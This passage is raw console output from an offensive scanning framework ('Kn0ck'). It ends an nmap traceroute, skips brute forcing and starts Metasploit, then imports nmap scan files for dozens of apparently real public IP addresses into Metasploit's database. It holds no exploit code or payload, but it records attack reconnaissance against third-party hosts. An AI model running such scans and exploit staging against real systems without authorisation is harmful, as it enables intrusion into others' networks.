505416 302.86 ms be2929.ccr31.phx01.atlas.cogentco.com (154.54.42.65)
505517 312.61 ms be3271.ccr41.lax04.atlas.cogentco.com (154.54.42.102)
505618 317.83 ms be3271.ccr41.lax04.atlas.cogentco.com (154.54.42.102)
505719 479.09 ms ae-2.cr-gw-2-sin-pip.sg.globaltransit.net (124.158.224.17)
505820 483.29 ms ae-2.cr-gw-2-sin-pip.sg.globaltransit.net (124.158.224.17)
505921 487.88 ms ae-1.cr-gw-2-kul-pip.my.globaltransit.net (61.11.212.57)
506022 480.45 ms 124.158.230.70
506123 487.53 ms 111.90.128.46
506224 489.10 ms 172.16.16.2
506325 483.46 ms web16.support-emilid.com (111.90.145.39)
5064
5065OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
5066Nmap done: 1 IP address (1 host up) scanned in 178.49 seconds
5067=======================================
5068 SKIPPING BRUTE FORCE
5069=======================================
5070=======================================
5071 SCAN COMPLETE!
5072=======================================
5073
5074 ___ ___
5075 \ /
5076 ....\||/....
5077 . . . .
5078 . .. .
5079 . 0 .. 0 .
5080 /\/\. . . ./\/\
5081 / / / .../| |\... \ \ \
5082 / / / \/ \ \ \
5083
5084 +----=[Kn0ck By @Mils]=----+
5085
5086[*] Opening loot directory /usr/share/knock/loot/ [OK]
5087 + -- --=[Starting Metasploit Service]=-- -- +
5088[i] Database already started
5089 + -- --=[Importing NMap XML files into Metasploit]=-- -- +
5090
5091
5092 .,,. .
5093 .\$$$$$L..,,==aaccaacc%#s$b. d8, d8P
5094 d8P #$$$$$$$$$$$$$$$$$$$$$$$$$$$b. `BP d888888p
5095 d888888P '7$$$$\""""''^^`` .7$$$|D*"'``` ?88'
5096 d8bd8b.d8p d8888b ?88' d888b8b _.os#$|8*"` d8P ?8b 88P
5097 88P`?P'?P d8b_,dP 88P d8P' ?88 .oaS###S*"` d8P d8888b $whi?88b 88b
5098 d88 d8 ?8 88b 88b 88b ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b
5099d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"` `?88' ?88 ?88 88b d88 d88
5100 .a#$$$$$$"` 88b d8P 88b`?8888P'
5101 ,s$$$$$$$"` 888888P' 88n _.,,,ass;:
5102 .a$$$$$$$P` d88P' .,.ass%#S$$$$$$$$$$$$$$'
5103 .a$###$$$P` _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$'
5104 ,a$$###$$P` _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS'
5105 .a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$'
5106_______________________________________________________________ ,&$$$$$$'_____
5107 ll&&$$$$'
5108 .;;lll&&&&'
5109 ...;;lllll&'
5110 ......;;;llll;;;....
5111 ` ......;;;;... . .
5112
5113
5114 =[ metasploit v5.0.76-dev ]
5115+ -- --=[ 1972 exploits - 1088 auxiliary - 339 post ]
5116+ -- --=[ 562 payloads - 45 encoders - 10 nops ]
5117+ -- --=[ 7 evasion ]
5118
5119* default
5120* default
5121[*] Importing 'Nmap XML' data
5122[*] Import: Parsing with 'Nokogiri v1.10.8'
5123[*] Importing host 104.244.79.89
5124[*] Successfully imported /usr/share/knock/loot/nmap/nmap-104.244.79.89-fullport.xml
5125[*] Importing 'Nmap XML' data
5126[*] Import: Parsing with 'Nokogiri v1.10.8'
5127[*] Importing host 206.48.140.40
5128[*] Successfully imported /usr/share/knock/loot/nmap/nmap-206.48.140.40-fullport.xml
5129[*] Importing 'Nmap XML' data
5130[*] Import: Parsing with 'Nokogiri v1.10.8'
5131[*] Importing host 190.98.209.37
5132[*] Successfully imported /usr/share/knock/loot/nmap/nmap-190.98.209.37-fullport.xml
5133[*] Importing 'Nmap XML' data
5134[*] Import: Parsing with 'Nokogiri v1.10.8'
5135[*] Importing host 207.246.147.189
5136[*] Successfully imported /usr/share/knock/loot/nmap/nmap-207.246.147.189-fullport-udp.xml
5137[*] Importing 'Nmap XML' data
5138[*] Import: Parsing with 'Nokogiri v1.10.8'
5139[*] Importing host 151.106.38.107
5140[*] Successfully imported /usr/share/knock/loot/nmap/nmap-151.106.38.107.xml
5141[*] Importing 'Nmap XML' data
5142[*] Import: Parsing with 'Nokogiri v1.10.8'
5143[*] Importing host 207.246.147.248
5144[*] Successfully imported /usr/share/knock/loot/nmap/nmap-207.246.147.248.xml
5145[*] Importing 'Nmap XML' data
5146[*] Import: Parsing with 'Nokogiri v1.10.8'
5147[*] Importing host 64.69.94.253
5148[*] Successfully imported /usr/share/knock/loot/nmap/nmap-udp-64.69.94.253.xml
5149[*] Importing 'Nmap XML' data
5150[*] Import: Parsing with 'Nokogiri v1.10.8'
5151[*] Importing host 207.246.147.247
5152[*] Successfully imported /usr/share/knock/loot/nmap/nmap-207.246.147.247.xml
5153[*] Importing 'Nmap XML' data
5154[*] Import: Parsing with 'Nokogiri v1.10.8'
5155[*] Importing host 190.98.209.37
5156[*] Successfully imported /usr/share/knock/loot/nmap/nmap-190.98.209.37.xml
5157[*] Importing 'Nmap XML' data
5158[*] Import: Parsing with 'Nokogiri v1.10.8'
5159[*] Successfully imported /usr/share/knock/loot/nmap/nmap-udp-149.126.72.220.xml
5160[*] Importing 'Nmap XML' data
5161[*] Import: Parsing with 'Nokogiri v1.10.8'
5162[*] Importing host 64.69.94.253
5163[*] Successfully imported /usr/share/knock/loot/nmap/nmap-64.69.94.253.xml
5164[*] Importing 'Nmap XML' data
5165[*] Import: Parsing with 'Nokogiri v1.10.8'
5166[*] Importing host 190.98.209.37
5167[*] Successfully imported /usr/share/knock/loot/nmap/nmap-udp-190.98.209.37.xml
5168[*] Importing 'Nmap XML' data
5169[*] Import: Parsing with 'Nokogiri v1.10.8'
5170[*] Importing host 92.123.250.65
5171[*] Successfully imported /usr/share/knock/loot/nmap/nmap-92.123.250.65-fullport.xml
5172[*] Importing 'Nmap XML' data
5173[*] Import: Parsing with 'Nokogiri v1.10.8'
5174[*] Importing host 158.69.13.254
5175[*] Successfully imported /usr/share/knock/loot/nmap/nmap-158.69.13.254.xml
5176[*] Importing 'Nmap XML' data
5177[*] Import: Parsing with 'Nokogiri v1.10.8'
5178[*] Importing host 151.106.38.107
5179[*] Successfully imported /usr/share/knock/loot/nmap/nmap-151.106.38.107-fullport-udp.xml
5180[*] Importing 'Nmap XML' data
5181[*] Import: Parsing with 'Nokogiri v1.10.8'
5182[*] Importing host 37.1.207.121
5183[*] Successfully imported /usr/share/knock/loot/nmap/nmap-udp-37.1.207.121.xml
5184[*] Importing 'Nmap XML' data
5185[*] Import: Parsing with 'Nokogiri v1.10.8'
5186[*] Importing host 82.94.222.131
5187[*] Successfully imported /usr/share/knock/loot/nmap/nmap-82.94.222.131-fullport.xml
5188[*] Importing 'Nmap XML' data
5189[*] Import: Parsing with 'Nokogiri v1.10.8'
5190[*] Importing host 190.153.209.187
5191[*] Successfully imported /usr/share/knock/loot/nmap/nmap-udp-190.153.209.187.xml
5192[*] Importing 'Nmap XML' data
5193[*] Import: Parsing with 'Nokogiri v1.10.8'
5194[*] Importing host 207.246.147.248
5195[*] Successfully imported /usr/share/knock/loot/nmap/nmap-207.246.147.248-fullport.xml
5196[*] Importing 'Nmap XML' data
5197[*] Import: Parsing with 'Nokogiri v1.10.8'
5198[*] Successfully imported /usr/share/knock/loot/nmap/nmap-82.94.222.131.xml
5199[*] Importing 'Nmap XML' data
5200[*] Import: Parsing with 'Nokogiri v1.10.8'
5201[*] Importing host 149.126.72.220
5202[*] Successfully imported /usr/share/knock/loot/nmap/nmap-149.126.72.220.xml
5203[*] Importing 'Nmap XML' data
5204[*] Import: Parsing with 'Nokogiri v1.10.8'
5205[*] Importing host 104.244.76.231
5206[*] Successfully imported /usr/share/knock/loot/nmap/nmap-104.244.76.231-fullport.xml
5207[*] Importing 'Nmap XML' data
5208[*] Import: Parsing with 'Nokogiri v1.10.8'
5209[*] Importing host 190.153.219.254
5210[*] Successfully imported /usr/share/knock/loot/nmap/nmap-190.153.219.254.xml
5211[*] Importing 'Nmap XML' data
5212[*] Import: Parsing with 'Nokogiri v1.10.8'
5213[*] Importing host 211.13.196.135
5214[*] Successfully imported /usr/share/knock/loot/nmap/nmap-udp-211.13.196.135.xml
5215[*] Importing 'Nmap XML' data
5216[*] Import: Parsing with 'Nokogiri v1.10.8'
5217[*] Importing host 45.88.202.111
5218[*] Successfully imported /usr/share/knock/loot/nmap/nmap-45.88.202.111-fullport-udp.xml
5219[*] Importing 'Nmap XML' data
5220[*] Import: Parsing with 'Nokogiri v1.10.8'
5221[*] Importing host 104.244.79.89
5222[*] Successfully imported /usr/share/knock/loot/nmap/nmap-104.244.79.89.xml
5223[*] Importing 'Nmap XML' data
5224[*] Import: Parsing with 'Nokogiri v1.10.8'
5225[*] Importing host 37.1.207.121
5226[*] Successfully imported /usr/share/knock/loot/nmap/nmap-37.1.207.121-fullport-udp.xml
5227[*] Importing 'Nmap XML' data
5228[*] Import: Parsing with 'Nokogiri v1.10.8'
5229[*] Importing host 82.94.222.131
5230[*] Successfully imported /usr/share/knock/loot/nmap/nmap-udp-82.94.222.131.xml
5231[*] Importing 'Nmap XML' data
5232[*] Import: Parsing with 'Nokogiri v1.10.8'
5233[*] Importing host 207.246.147.190
5234[*] Successfully imported /usr/share/knock/loot/nmap/nmap-207.246.147.190-fullport.xml
5235[*] Importing 'Nmap XML' data
5236[*] Import: Parsing with 'Nokogiri v1.10.8'
5237[*] Importing host 104.244.79.89
5238[*] Successfully imported /usr/share/knock/loot/nmap/nmap-104.244.79.89-fullport-udp.xml
5239[*] Importing 'Nmap XML' data
5240[*] Import: Parsing with 'Nokogiri v1.10.8'
5241[*] Importing host 162.244.35.13
5242[*] Successfully imported /usr/share/knock/loot/nmap/nmap-udp-162.244.35.13.xml
5243[*] Importing 'Nmap XML' data
5244[*] Import: Parsing with 'Nokogiri v1.10.8'
5245[*] Importing host 169.239.218.20
5246[*] Successfully imported /usr/share/knock/loot/nmap/nmap-169.239.218.20.xml
5247[*] Importing 'Nmap XML' data
5248[*] Import: Parsing with 'Nokogiri v1.10.8'
5249[*] Importing host 207.246.147.189
5250[*] Successfully imported /usr/share/knock/loot/nmap/nmap-207.246.147.189-fullport.xml
5251[*] Importing 'Nmap XML' data
5252[*] Import: Parsing with 'Nokogiri v1.10.8'
5253[*] Importing host 64.69.94.253
5254[*] Successfully imported /usr/share/knock/loot/nmap/nmap-64.69.94.253-fullport-udp.xml
5255[*] Importing 'Nmap XML' data
5256[*] Import: Parsing with 'Nokogiri v1.10.8'
5257[*] Importing host 190.153.209.187
5258[*] Successfully imported /usr/share/knock/loot/nmap/nmap-190.153.209.187-fullport-udp.xml
5259[*] Importing 'Nmap XML' data
5260[*] Import: Parsing with 'Nokogiri v1.10.8'
5261[*] Importing host 207.246.147.189
5262[*] Successfully imported /usr/share/knock/loot/nmap/nmap-207.246.147.189.xml
5263[*] Importing 'Nmap XML' data
5264[*] Import: Parsing with 'Nokogiri v1.10.8'
5265[*] Successfully imported /usr/share/knock/loot/nmap/nmap-204.93.193.141-fullport.xml
5266[*] Importing 'Nmap XML' data
5267[*] Import: Parsing with 'Nokogiri v1.10.8'
5268[*] Importing host 92.123.250.65
5269[*] Successfully imported /usr/share/knock/loot/nmap/nmap-92.123.250.65.xml
5270[*] Importing 'Nmap XML' data
5271[*] Import: Parsing with 'Nokogiri v1.10.8'
5272[*] Importing host 158.69.13.254
5273[*] Successfully imported /usr/share/knock/loot/nmap/nmap-udp-158.69.13.254.xml
5274[*] Importing 'Nmap XML' data
5275[*] Import: Parsing with 'Nokogiri v1.10.8'
5276[*] Importing host 69.163.233.4
5277[*] Successfully imported /usr/share/knock/loot/nmap/nmap-udp-69.163.233.4.xml
5278[*] Importing 'Nmap XML' data
5279[*] Import: Parsing with 'Nokogiri v1.10.8'
5280[*] Importing host 218.45.5.97
5281[*] Successfully imported /usr/share/knock/loot/nmap/nmap-udp-218.45.5.97.xml
5282[*] Importing 'Nmap XML' data
5283[*] Import: Parsing with 'Nokogiri v1.10.8'
5284[*] Importing host 151.106.38.107
5285[*] Successfully imported /usr/share/knock/loot/nmap/nmap-udp-151.106.38.107.xml
5286[*] Importing 'Nmap XML' data
5287[*] Import: Parsing with 'Nokogiri v1.10.8'
5288[*] Importing host 206.48.140.40
5289[*] Successfully imported /usr/share/knock/loot/nmap/nmap-206.48.140.40.xml
5290[*] Importing 'Nmap XML' data
5291[*] Import: Parsing with 'Nokogiri v1.10.8'
5292[*] Importing host 74.117.180.192
5293[*] Successfully imported /usr/share/knock/loot/nmap/nmap-74.117.180.192-fullport-udp.xml
5294[*] Importing 'Nmap XML' data
5295[*] Import: Parsing with 'Nokogiri v1.10.8'
5296[*] Importing host 169.239.218.20
5297[*] Successfully imported /usr/share/knock/loot/nmap/nmap-169.239.218.20-fullport-udp.xml
5298[*] Importing 'Nmap XML' data
5299[*] Import: Parsing with 'Nokogiri v1.10.8'
5300[*] Importing host 174.142.53.51
5301[*] Successfully imported /usr/share/knock/loot/nmap/nmap-174.142.53.51.xml
5302[*] Importing 'Nmap XML' data
5303[*] Import: Parsing with 'Nokogiri v1.10.8'
5304[*] Successfully imported /usr/share/knock/loot/nmap/nmap-37.1.207.121.xml
5305[*] Importing 'Nmap XML' data
5306[*] Import: Parsing with 'Nokogiri v1.10.8'
5307[*] Importing host 190.153.219.254
5308[*] Successfully imported /usr/share/knock/loot/nmap/nmap-udp-190.153.219.254.xml
5309[*] Importing 'Nmap XML' data
5310[*] Import: Parsing with 'Nokogiri v1.10.8'
5311[*] Importing host 169.239.218.20
5312[*] Successfully imported /usr/share/knock/loot/nmap/nmap-169.239.218.20-fullport.xml
5313[*] Importing 'Nmap XML' data
5314[*] Import: Parsing with 'Nokogiri v1.10.8'
5315[*] Importing host 92.123.250.35
5316[*] Successfully imported /usr/share/knock/loot/nmap/nmap-udp-92.123.250.35.xml
5317[*] Importing 'Nmap XML' data
5318[*] Import: Parsing with 'Nokogiri v1.10.8'
5319[*] Importing host 207.246.147.247
5320[*] Successfully imported /usr/share/knock/loot/nmap/nmap-udp-207.246.147.247.xml
5321[*] Importing 'Nmap XML' data
5322[*] Import: Parsing with 'Nokogiri v1.10.8'
5323[*] Importing host 200.73.54.34
5324[*] Successfully imported /usr/share/knock/loot/nmap/nmap-udp-200.73.54.34.xml
5325[*] Importing 'Nmap XML' data
5326[*] Import: Parsing with 'Nokogiri v1.10.8'
5327[*] Importing host 162.244.35.13
5328[*] Successfully imported /usr/share/knock/loot/nmap/nmap-162.244.35.13-fullport.xml
5329[*] Importing 'Nmap XML' data
5330[*] Import: Parsing with 'Nokogiri v1.10.8'
5331[*] Importing host 190.153.209.187
5332[*] Successfully imported /usr/share/knock/loot/nmap/nmap-190.153.209.187-fullport.xml
5333[*] Importing 'Nmap XML' data
5334[*] Import: Parsing with 'Nokogiri v1.10.8'
5335[*] Importing host 92.123.250.35
5336[*] Successfully imported /usr/share/knock/loot/nmap/nmap-92.123.250.35-fullport-udp.xml
5337[*] Importing 'Nmap XML' data
5338[*] Import: Parsing with 'Nokogiri v1.10.8'
5339[*] Importing host 158.69.13.254
5340[*] Successfully imported /usr/share/knock/loot/nmap/nmap-158.69.13.254-fullport.xml
5341[*] Importing 'Nmap XML' data
5342[*] Import: Parsing with 'Nokogiri v1.10.8'
5343[*] Importing host 92.123.250.35
5344[*] Successfully imported /usr/share/knock/loot/nmap/nmap-92.123.250.35.xml
5345[*] Importing 'Nmap XML' data
5346[*] Import: Parsing with 'Nokogiri v1.10.8'
5347[*] Importing host 74.117.180.192
5348[*] Successfully imported /usr/share/knock/loot/nmap/nmap-udp-74.117.180.192.xml
5349[*] Importing 'Nmap XML' data
5350[*] Import: Parsing with 'Nokogiri v1.10.8'
5351[*] Importing host 151.106.38.107
5352[*] Successfully imported /usr/share/knock/loot/nmap/nmap-151.106.38.107-fullport.xml
5353[*] Importing 'Nmap XML' data
5354[*] Import: Parsing with 'Nokogiri v1.10.8'
5355[*] Importing host 104.244.76.231
5356[*] Successfully imported /usr/share/knock/loot/nmap/nmap-104.244.76.231.xml
5357[*] Importing 'Nmap XML' data
5358[*] Import: Parsing with 'Nokogiri v1.10.8'
5359[*] Importing host 204.93.193.141
5360[*] Successfully imported /usr/share/knock/loot/nmap/nmap-udp-204.93.193.141.xml
5361[*] Importing 'Nmap XML' data
5362[*] Import: Parsing with 'Nokogiri v1.10.8'
5363[*] Importing host 173.214.244.169
5364[*] Successfully imported /usr/share/knock/loot/nmap/nmap-udp-173.214.244.169.xml
5365[*] Importing 'Nmap XML' data
5366[*] Import: Parsing with 'Nokogiri v1.10.8'
5367[*] Importing host 104.244.77.188
5368[*] Successfully imported /usr/share/knock/loot/nmap/nmap-udp-104.244.77.188.xml
5369[*] Importing 'Nmap XML' data
5370[*] Import: Parsing with 'Nokogiri v1.10.8'
5371[*] Importing host 149.126.72.220
5372[*] Successfully imported /usr/share/knock/loot/nmap/nmap-149.126.72.220-fullport.xml
5373[*] Importing 'Nmap XML' data
5374[*] Import: Parsing with 'Nokogiri v1.10.8'
5375[*] Importing host 207.246.147.247
5376[*] Successfully imported /usr/share/knock/loot/nmap/nmap-207.246.147.247-fullport-udp.xml
5377[*] Importing 'Nmap XML' data
5378[*] Import: Parsing with 'Nokogiri v1.10.8'
5379[*] Importing host 104.244.77.188
5380[*] Successfully imported /usr/share/knock/loot/nmap/nmap-104.244.77.188-fullport.xml
5381[*] Importing 'Nmap XML' data
5382[*] Import: Parsing with 'Nokogiri v1.10.8'
5383[*] Importing host 104.244.79.89
5384[*] Successfully imported /usr/share/knock/loot/nmap/nmap-udp-104.244.79.89.xml
5385[*] Importing 'Nmap XML' data
5386[*] Import: Parsing with 'Nokogiri v1.10.8'
5387[*] Importing host 69.163.233.4
5388[*] Successfully imported /usr/share/knock/loot/nmap/nmap-69.163.233.4-fullport.xml
5389[*] Importing 'Nmap XML' data
5390[*] Import: Parsing with 'Nokogiri v1.10.8'
5391[*] Importing host 74.117.180.192
5392[*] Successfully imported /usr/share/knock/loot/nmap/nmap-74.117.180.192.xml
5393[*] Importing 'Nmap XML' data
5394[*] Import: Parsing with 'Nokogiri v1.10.8'
5395[*] Importing host 218.45.5.97
5396[*] Successfully imported /usr/share/knock/loot/nmap/nmap-218.45.5.97-fullport.xml
5397[*] Importing 'Nmap XML' data
5398[*] Import: Parsing with 'Nokogiri v1.10.8'
5399[*] Importing host 204.93.193.141
5400[*] Successfully imported /usr/share/knock/loot/nmap/nmap-204.93.193.141-fullport-udp.xml
5401[*] Importing 'Nmap XML' data
5402[*] Import: Parsing with 'Nokogiri v1.10.8'
5403[*] Importing host 207.246.147.189
5404[*] Successfully imported /usr/share/knock/loot/nmap/nmap-udp-207.246.147.189.xml
5405[*] Importing 'Nmap XML' data
5406[*] Import: Parsing with 'Nokogiri v1.10.8'
5407[*] Importing host 218.45.5.97
5408[*] Successfully imported /usr/share/knock/loot/nmap/nmap-218.45.5.97-fullport-udp.xml
5409[*] Importing 'Nmap XML' data
5410[*] Import: Parsing with 'Nokogiri v1.10.8'
5411[*] Importing host 158.69.13.254
5412[*] Successfully imported /usr/share/knock/loot/nmap/nmap-158.69.13.254-fullport-udp.xml
5413[*] Importing 'Nmap XML' data
5414[*] Import: Parsing with 'Nokogiri v1.10.8'
5415[*] Importing host 111.90.145.39
5416[*] Successfully imported /usr/share/knock/loot/nmap/nmap-111.90.145.39-fullport.xml
5417[*] Importing 'Nmap XML' data
5418[*] Import: Parsing with 'Nokogiri v1.10.8'
5419[*] Importing host 64.69.94.253
5420[*] Successfully imported /usr/share/knock/loot/nmap/nmap-64.69.94.253-fullport.xml
5421[*] Importing 'Nmap XML' data
5422[*] Import: Parsing with 'Nokogiri v1.10.8'
5423[*] Importing host 174.142.53.51
5424[*] Successfully imported /usr/share/knock/loot/nmap/nmap-174.142.53.51-fullport.xml
5425[*] Importing 'Nmap XML' data
5426[*] Import: Parsing with 'Nokogiri v1.10.8'
5427[*] Successfully imported /usr/share/knock/loot/nmap/nmap-82.94.222.131-fullport-udp.xml
5428[*] Importing 'Nmap XML' data
5429[*] Import: Parsing with 'Nokogiri v1.10.8'
5430[*] Importing host 169.239.218.20
5431[*] Successfully imported /usr/share/knock/loot/nmap/nmap-udp-169.239.218.20.xml
5432[*] Importing 'Nmap XML' data
5433[*] Import: Parsing with 'Nokogiri v1.10.8'
5434[*] Importing host 200.73.54.34
5435[*] Successfully imported /usr/share/knock/loot/nmap/nmap-200.73.54.34-fullport-udp.xml
5436[*] Importing 'Nmap XML' data
5437[*] Import: Parsing with 'Nokogiri v1.10.8'
5438[*] Importing host 104.244.77.188
5439[*] Successfully imported /usr/share/knock/loot/nmap/nmap-104.244.77.188-fullport-udp.xml
5440[*] Importing 'Nmap XML' data
5441[*] Import: Parsing with 'Nokogiri v1.10.8'
5442[*] Importing host 190.98.209.37
5443[*] Successfully imported /usr/share/knock/loot/nmap/nmap-190.98.209.37-fullport-udp.xml
5444[*] Importing 'Nmap XML' data
5445[*] Import: Parsing with 'Nokogiri v1.10.8'
5446[*] Importing host 190.153.219.254
5447[*] Successfully imported /usr/share/knock/loot/nmap/nmap-190.153.219.254-fullport.xml
5448[*] Importing 'Nmap XML' data
5449[*] Import: Parsing with 'Nokogiri v1.10.8'
5450[*] Importing host 207.246.147.190
5451[*] Successfully imported /usr/share/knock/loot/nmap/nmap-udp-207.246.147.190.xml
5452[*] Importing 'Nmap XML' data
5453[*] Import: Parsing with 'Nokogiri v1.10.8'
5454[*] Importing host 92.123.250.65
5455[*] Successfully imported /usr/share/knock/loot/nmap/nmap-92.123.250.65-fullport-udp.xml
5456[*] Importing 'Nmap XML' data
5457[*] Import: Parsing with 'Nokogiri v1.10.8'
5458[*] Importing host 174.142.53.51
5459[*] Successfully imported /usr/share/knock/loot/nmap/nmap-174.142.53.51-fullport-udp.xml
5460[*] Importing 'Nmap XML' data
5461[*] Import: Parsing with 'Nokogiri v1.10.8'
5462[*] Importing host 104.244.76.231
5463[*] Successfully imported /usr/share/knock/loot/nmap/nmap-104.244.76.231-fullport-udp.xml
5464[*] Importing 'Nmap XML' data
5465[*] Import: Parsing with 'Nokogiri v1.10.8'
5466[*] Importing host 104.244.77.188
5467[*] Successfully imported /usr/share/knock/loot/nmap/nmap-104.244.77.188.xml
5468[*] Importing 'Nmap XML' data
5469[*] Import: Parsing with 'Nokogiri v1.10.8'
5470[*] Importing host 45.88.202.111
5471[*] Successfully imported /usr/share/knock/loot/nmap/nmap-45.88.202.111.xml
5472[*] Importing 'Nmap XML' data
5473[*] Import: Parsing with 'Nokogiri v1.10.8'
5474[*] Importing host 111.90.145.39
5475[*] Successfully imported /usr/share/knock/loot/nmap/nmap-111.90.145.39-fullport-udp.xml
5476[*] Importing 'Nmap XML' data
5477[*] Import: Parsing with 'Nokogiri v1.10.8'
5478[*] Importing host 207.246.147.247
5479[*] Successfully imported /usr/share/knock/loot/nmap/nmap-207.246.147.247-fullport.xml
5480[*] Importing 'Nmap XML' data
5481[*] Import: Parsing with 'Nokogiri v1.10.8'
5482[*] Importing host 162.244.35.13
5483[*] Successfully imported /usr/share/knock/loot/nmap/nmap-162.244.35.13-fullport-udp.xml
5484[*] Importing 'Nmap XML' data
5485[*] Import: Parsing with 'Nokogiri v1.10.8'
5486[*] Importing host 211.13.196.135
5487[*] Successfully imported /usr/share/knock/loot/nmap/nmap-211.13.196.135.xml
5488[*] Importing 'Nmap XML' data
5489[*] Import: Parsing with 'Nokogiri v1.10.8'
5490[*] Successfully imported /usr/share/knock/loot/nmap/nmap-37.1.207.121-fullport.xml
5491[*] Importing 'Nmap XML' data
5492[*] Import: Parsing with 'Nokogiri v1.10.8'
5493[*] Importing host 206.48.140.40
5494[*] Successfully imported /usr/share/knock/loot/nmap/nmap-206.48.140.40-fullport-udp.xml
5495[*] Importing 'Nmap XML' data
5496[*] Import: Parsing with 'Nokogiri v1.10.8'
5497[*] Importing host 111.90.145.39
5498[*] Successfully imported /usr/share/knock/loot/nmap/nmap-udp-111.90.145.39.xml
5499[*] Importing 'Nmap XML' data
5500[*] Import: Parsing with 'Nokogiri v1.10.8'
5501[*] Importing host 45.88.202.111
5502[*] Successfully imported /usr/share/knock/loot/nmap/nmap-udp-45.88.202.111.xml
5503[*] Importing 'Nmap XML' data
5504[*] Import: Parsing with 'Nokogiri v1.10.8'
5505[*] Importing host 206.48.140.40
5506[*] Successfully imported /usr/share/knock/loot/nmap/nmap-udp-206.48.140.40.xml
5507[*] Importing 'Nmap XML' data
5508[*] Import: Parsing with 'Nokogiri v1.10.8'
5509[*] Importing host 173.214.244.169
5510[*] Successfully imported /usr/share/knock/loot/nmap/nmap-173.214.244.169.xml
5511[*] Importing 'Nmap XML' data
5512[*] Import: Parsing with 'Nokogiri v1.10.8'
5513[*] Importing host 207.246.147.190
5514[*] Successfully imported /usr/share/knock/loot/nmap/nmap-207.246.147.190.xml
5515[*] Importing 'Nmap XML' data
5516[*] Import: Parsing with 'Nokogiri v1.10.8'
5517[*] Importing host 92.123.250.65
5518[*] Successfully imported /usr/share/knock/loot/nmap/nmap-udp-92.123.250.65.xml
5519[*] Importing 'Nmap XML' data
5520[*] Import: Parsing with 'Nokogiri v1.10.8'
5521[*] Importing host 174.142.53.51
5522[*] Successfully imported /usr/share/knock/loot/nmap/nmap-udp-174.142.53.51.xml
5523[*] Importing 'Nmap XML' data
5524[*] Import: Parsing with 'Nokogiri v1.10.8'
5525[*] Importing host 207.246.147.248
5526[*] Successfully imported /usr/share/knock/loot/nmap/nmap-207.246.147.248-fullport-udp.xml
5527[*] Importing 'Nmap XML' data
5528[*] Import: Parsing with 'Nokogiri v1.10.8'
5529[*] Importing host 74.117.180.192
5530[*] Successfully imported /usr/share/knock/loot/nmap/nmap-74.117.180.192-fullport.xml
5531[*] Importing 'Nmap XML' data
5532[*] Import: Parsing with 'Nokogiri v1.10.8'
5533[*] Importing host 45.88.202.111
5534[*] Successfully imported /usr/share/knock/loot/nmap/nmap-45.88.202.111-fullport.xml
5535[*] Importing 'Nmap XML' data
5536[*] Import: Parsing with 'Nokogiri v1.10.8'
5537[*] Importing host 173.214.244.169
5538[*] Successfully imported /usr/share/knock/loot/nmap/nmap-173.214.244.169-fullport-udp.xml
5539[*] Importing 'Nmap XML' data
5540[*] Import: Parsing with 'Nokogiri v1.10.8'
5541[*] Importing host 104.244.76.231
5542[*] Successfully imported /usr/share/knock/loot/nmap/nmap-udp-104.244.76.231.xml
5543[*] Importing 'Nmap XML' data
5544[*] Import: Parsing with 'Nokogiri v1.10.8'
5545[*] Importing host 190.153.209.187
5546[*] Successfully imported /usr/share/knock/loot/nmap/nmap-190.153.209.187.xml
5547[*] Importing 'Nmap XML' data
5548[*] Import: Parsing with 'Nokogiri v1.10.8'
5549[*] Importing host 211.13.196.135
5550[*] Successfully imported /usr/share/knock/loot/nmap/nmap-211.13.196.135-fullport-udp.xml
5551[*] Importing 'Nmap XML' data
5552[*] Import: Parsing with 'Nokogiri v1.10.8'
5553[*] Importing host 92.123.250.35
5554[*] Successfully imported /usr/share/knock/loot/nmap/nmap-92.123.250.35-fullport.xml
5555[*] Importing 'Nmap XML' data
5556[*] Import: Parsing with 'Nokogiri v1.10.8'
5557[*] Importing host 149.126.72.220
5558[*] Successfully imported /usr/share/knock/loot/nmap/nmap-149.126.72.220-fullport-udp.xml
5559[*] Importing 'Nmap XML' data
5560[*] Import: Parsing with 'Nokogiri v1.10.8'
5561[*] Importing host 173.214.244.169
5562[*] Successfully imported /usr/share/knock/loot/nmap/nmap-173.214.244.169-fullport.xml
5563[*] Importing 'Nmap XML' data
5564[*] Import: Parsing with 'Nokogiri v1.10.8'
5565[*] Importing host 211.13.196.135
5566[*] Successfully imported /usr/share/knock/loot/nmap/nmap-211.13.196.135-fullport.xml
5567[*] Importing 'Nmap XML' data
5568[*] Import: Parsing with 'Nokogiri v1.10.8'
5569[*] Importing host 162.244.35.13
5570[*] Successfully imported /usr/share/knock/loot/nmap/nmap-162.244.35.13.xml
5571[*] Importing 'Nmap XML' data
5572[*] Import: Parsing with 'Nokogiri v1.10.8'
5573[*] Importing host 207.246.147.248
5574[*] Successfully imported /usr/share/knock/loot/nmap/nmap-udp-207.246.147.248.xml
5575[*] Importing 'Nmap XML' data
5576[*] Import: Parsing with 'Nokogiri v1.10.8'
5577[*] Importing host 69.163.233.4
5578[*] Successfully imported /usr/share/knock/loot/nmap/nmap-69.163.233.4-fullport-udp.xml
5579[*] Importing 'Nmap XML' data
5580[*] Import: Parsing with 'Nokogiri v1.10.8'
5581[*] Importing host 218.45.5.97
5582[*] Successfully imported /usr/share/knock/loot/nmap/nmap-218.45.5.97.xml
5583[*] Importing 'Nmap XML' data
5584[*] Import: Parsing with 'Nokogiri v1.10.8'
5585[*] Successfully imported /usr/share/knock/loot/nmap/nmap-204.93.193.141.xml
5586[*] Importing 'Nmap XML' data
5587[*] Import: Parsing with 'Nokogiri v1.10.8'
5588[*] Importing host 111.90.145.39
5589[*] Successfully imported /usr/share/knock/loot/nmap/nmap-111.90.145.39.xml
5590[*] Importing 'Nmap XML' data
5591[*] Import: Parsing with 'Nokogiri v1.10.8'
5592[*] Importing host 190.153.219.254
5593[*] Successfully imported /usr/share/knock/loot/nmap/nmap-190.153.219.254-fullport-udp.xml
5594[*] Importing 'Nmap XML' data
5595[*] Import: Parsing with 'Nokogiri v1.10.8'
5596[*] Importing host 207.246.147.190
5597[*] Successfully imported /usr/share/knock/loot/nmap/nmap-207.246.147.190-fullport-udp.xml
5598[*] Importing 'Nmap XML' data
5599[*] Import: Parsing with 'Nokogiri v1.10.8'
